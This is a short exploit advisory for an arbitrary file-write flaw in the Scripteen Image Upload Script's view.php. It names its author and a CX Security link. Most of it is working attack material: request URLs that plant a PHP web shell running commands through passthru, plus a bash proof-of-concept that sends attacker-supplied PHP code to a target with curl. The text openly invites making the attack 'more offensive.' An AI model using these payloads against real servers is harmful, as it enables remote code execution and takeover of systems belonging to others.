Share
[+] Exploit Title : Scripteen İmage Upload Script Arbitrary File Injection  
  
[+] Venedor Home Page : https://scripteen.com/  
[+] Author : z3r0fy  
[+] Twitter : z3r0fy  
[+] Website : www.bugcontainer.gq  
[+] CX Security Link : https://cxsecurity.com/issue/WLB-2019100145  
  
[+] Description :  
  
Due to these codes in the View.php file  
  
$home = fopen($_GET["file"], "w"); fwrite($home, $_GET["data"]);  
  
File can be written arbitrarily  
Exploit : /app/view.php?file=shell.php&data=<?php phpinfo();?>  
If you want to be made more offensive,  
app/view.php?file=shell.php&data=<?php passthru($_GET["cmd"]);?>  
After poc is applied, This way the command can be run on the server "shell.php?cmd=" ​​  
  
  
  
[+] PoC :  
  
#!/bin/bash  
echo "  
__________ ____ ___ _______ __  
|__ /___ /| _ \ / _ \| ___\ \ / /  
/ / |_ \| |_) | | | | |_ \ V /  
/ /_ ___) | _ <| |_| | _| | |  
/____|____/|_| \_\\___/|_| |_|  
  
"  
echo" "  
echo -n "[+] TARGET : " ;read hedef  
echo -n "[+] PHP Code : " ;read kod  
curl $hedef/app/view.php?file=shell.php&data=$kod